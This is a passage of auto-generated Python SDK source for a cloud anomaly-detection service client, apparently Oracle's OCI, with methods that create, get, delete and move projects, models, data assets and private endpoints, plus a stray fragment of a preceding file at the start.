"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_project_details,
response_type="Project")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_project_details,
response_type="Project")
| 48.434457 | 261 | 0.647801 |
from __future__ import absolute_import
from oci._vendor import requests
from oci._vendor import six
from oci import retry, circuit_breaker
from oci.base_client import BaseClient
from oci.config import get_config_value_or_default, validate_config
from oci.signer import Signer
from oci.util import Sentinel, get_signer_from_authentication_type, AUTHENTICATION_TYPE_FIELD_NAME
from .models import ai_anomaly_detection_type_mapping
missing = Sentinel("Missing")
class AnomalyDetectionClient(object):
def __init__(self, config, **kwargs):
validate_config(config, signer=kwargs.get('signer'))
if 'signer' in kwargs:
signer = kwargs['signer']
elif AUTHENTICATION_TYPE_FIELD_NAME in config:
signer = get_signer_from_authentication_type(config)
else:
signer = Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
base_client_init_kwargs = {
'regional_client': True,
'service_endpoint': kwargs.get('service_endpoint'),
'base_path': '/20210101',
'service_endpoint_template': 'https://anomalydetection.aiservice.{region}.oci.{secondLevelDomain}',
'skip_deserialization': kwargs.get('skip_deserialization', False),
'circuit_breaker_strategy': kwargs.get('circuit_breaker_strategy', circuit_breaker.GLOBAL_CIRCUIT_BREAKER_STRATEGY)
}
if 'timeout' in kwargs:
base_client_init_kwargs['timeout'] = kwargs.get('timeout')
self.base_client = BaseClient("anomaly_detection", config, signer, ai_anomaly_detection_type_mapping, **base_client_init_kwargs)
self.retry_strategy = kwargs.get('retry_strategy')
self.circuit_breaker_callback = kwargs.get('circuit_breaker_callback')
def cancel_work_request(self, work_request_id, **kwargs):
resource_path = "/workRequests/{workRequestId}"
method = "DELETE"
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"cancel_work_request got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def change_ai_private_endpoint_compartment(self, ai_private_endpoint_id, change_ai_private_endpoint_compartment_details, **kwargs):
resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_ai_private_endpoint_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"aiPrivateEndpointId": ai_private_endpoint_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_ai_private_endpoint_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_ai_private_endpoint_compartment_details)
def change_data_asset_compartment(self, data_asset_id, change_data_asset_compartment_details, **kwargs):
resource_path = "/dataAssets/{dataAssetId}/actions/changeCompartment"
method = "POST"
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_data_asset_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"dataAssetId": data_asset_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_data_asset_compartment_details,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_data_asset_compartment_details,
response_type="DataAsset")
def change_model_compartment(self, model_id, change_model_compartment_details, **kwargs):
resource_path = "/models/{modelId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_model_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"modelId": model_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_model_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_model_compartment_details)
def change_project_compartment(self, project_id, change_project_compartment_details, **kwargs):
resource_path = "/projects/{projectId}/actions/changeCompartment"
method = "POST"
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_project_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"projectId": project_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_project_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_project_compartment_details)
def create_ai_private_endpoint(self, create_ai_private_endpoint_details, **kwargs):
resource_path = "/aiPrivateEndpoints"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_ai_private_endpoint got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_ai_private_endpoint_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_ai_private_endpoint_details)
def create_data_asset(self, create_data_asset_details, **kwargs):
resource_path = "/dataAssets"
method = "POST"
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_data_asset_details,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_data_asset_details,
response_type="DataAsset")
def create_model(self, create_model_details, **kwargs):
resource_path = "/models"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_model got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_model_details,
response_type="Model")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_model_details,
response_type="Model")
def create_project(self, create_project_details, **kwargs):
resource_path = "/projects"
method = "POST"
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_project got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_project_details,
response_type="Project")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_project_details,
response_type="Project")
def delete_ai_private_endpoint(self, ai_private_endpoint_id, **kwargs):
resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_ai_private_endpoint got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"aiPrivateEndpointId": ai_private_endpoint_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_data_asset(self, data_asset_id, **kwargs):
resource_path = "/dataAssets/{dataAssetId}"
method = "DELETE"
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"dataAssetId": data_asset_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_model(self, model_id, **kwargs):
resource_path = "/models/{modelId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_model got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"modelId": model_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_project(self, project_id, **kwargs):
resource_path = "/projects/{projectId}"
method = "DELETE"
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"projectId": project_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def detect_anomalies(self, detect_anomalies_details, **kwargs):
resource_path = "/actions/detectAnomalies"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"detect_anomalies got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=detect_anomalies_details,
response_type="AnomalyDetectResult")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=detect_anomalies_details,
response_type="AnomalyDetectResult")
def get_ai_private_endpoint(self, ai_private_endpoint_id, **kwargs):
resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}"
method = "GET"
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_ai_private_endpoint got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"aiPrivateEndpointId": ai_private_endpoint_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="AiPrivateEndpoint")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="AiPrivateEndpoint")
def get_data_asset(self, data_asset_id, **kwargs):
resource_path = "/dataAssets/{dataAssetId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"dataAssetId": data_asset_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataAsset")
def get_model(self, model_id, **kwargs):
resource_path = "/models/{modelId}"
method = "GET"
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_model got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"modelId": model_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Model")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Model")
def get_project(self, project_id, **kwargs):
resource_path = "/projects/{projectId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"projectId": project_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Project")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Project")
def get_work_request(self, work_request_id, **kwargs):
resource_path = "/workRequests/{workRequestId}"
method = "GET"
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_work_request got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WorkRequest")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
